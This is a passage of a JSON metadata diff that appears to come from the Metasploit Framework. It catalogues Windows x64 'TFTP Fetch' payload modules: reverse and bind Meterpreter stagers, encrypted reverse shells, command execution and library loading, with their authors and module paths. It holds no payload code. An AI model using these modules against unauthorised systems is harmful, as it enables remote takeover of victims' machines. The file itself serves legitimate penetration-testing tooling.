300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + 
"payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/tftp/x64/encrypted_shell/reverse_tcp": { + "name": "TFTP Fetch, Windows Command Shell, Encrypted Reverse TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/encrypted_shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Matt Graeber", + "Shelby Pace" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/encrypted_shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/encrypted_shell/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/encrypted_shell", + "stager_refname": "windows/x64/encrypted_reverse_tcp" + }, + "payload_cmd/windows/tftp/x64/encrypted_shell_reverse_tcp": { + "name": "TFTP Fetch, Windows Encrypted Reverse Shell", + "fullname": "payload/cmd/windows/tftp/x64/encrypted_shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Matt Graeber", + "Shelby Pace" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn an encrypted command shell", + 
"references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/encrypted_shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/encrypted_shell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/tftp/x64/exec": { + "name": "TFTP Fetch, Windows x64 Execute Command", + "fullname": "payload/cmd/windows/tftp/x64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nExecute an arbitrary command (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/exec", + "staged": false + }, + "payload_cmd/windows/tftp/x64/loadlibrary": { + "name": "TFTP Fetch, Windows x64 LoadLibrary Path", + "fullname": "payload/cmd/windows/tftp/x64/loadlibrary", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "scriptjunkie", + "sf " + ], + "description": "Fetch and execute an x64 payload from 
a TFTP server.\nLoad an arbitrary x64 library path", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/loadlibrary", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/loadlibrary", + "staged": false + }, + "payload_cmd/windows/tftp/x64/messagebox": { + "name": "TFTP Fetch, Windows MessageBox x64", + "fullname": "payload/cmd/windows/tftp/x64/messagebox", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "pasta " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a dialog via MessageBox using a customizable title, text & icon", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/messagebox", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/messagebox", + "staged": false + }, + "payload_cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp": { + "name": "TFTP Fetch, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + 
"Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp_uuid": { + "name": "TFTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": 
"cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/meterpreter/bind_named_pipe": { + "name": "TFTP Fetch, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/tftp/x64/meterpreter/bind_tcp": { + "name": "TFTP Fetch, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/bind_tcp", + "aliases": 
[], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/tftp/x64/meterpreter/bind_tcp_rc4": { + "name": "TFTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", 
+ "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/tftp/x64/meterpreter/bind_tcp_uuid": { + "name": "TFTP Fetch, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/meterpreter/reverse_http": { + "name": "TFTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": 
"payload/cmd/windows/tftp/x64/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_http", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/tftp/x64/meterpreter/reverse_https": { + "name": "TFTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "agix", + "rwincey" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + 
"mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_https", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/tftp/x64/meterpreter/reverse_named_pipe": { + "name": "TFTP Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + 
"payload_cmd/windows/tftp/x64/meterpreter/reverse_tcp": { + "name": "TFTP Fetch, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/tftp/x64/meterpreter/reverse_tcp_rc4": { + "name": "TFTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": 
"Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/tftp/x64/meterpreter/reverse_tcp_uuid": { + "name": "TFTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp_uuid", + "staged": true, + 
"stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/meterpreter/reverse_winhttp": { + "name": "TFTP Fetch, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/tftp/x64/meterpreter/reverse_winhttps": { + "name": "TFTP Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [ + 
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/tftp/x64/meterpreter_bind_named_pipe": { + "name": "TFTP Fetch, Windows Meterpreter Shell, Bind Named Pipe Inline (x64)", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter_bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "UserExistsError", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect to victim and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter_bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter_bind_named_pipe", + "staged": false + }, + "payload_cmd/windows/tftp/x64/meterpreter_bind_tcp": { + "name": "TFTP Fetch, Windows Meterpreter Shell, Bind TCP Inline (x64)", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect to victim and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter_bind_tcp", + "staged": false + }, + "payload_cmd/windows/tftp/x64/meterpreter_reverse_http": { + "name": "TFTP Fetch, Windows Meterpreter Shell, Reverse HTTP Inline (x64)", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/windows/tftp/x64/meterpreter_reverse_https": { + "name": "TFTP Fetch, Windows Meterpreter Shell, Reverse HTTPS Inline (x64)", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/windows/tftp/x64/meterpreter_reverse_ipv6_tcp": { + "name": "TFTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter_reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a Meterpreter shell. 
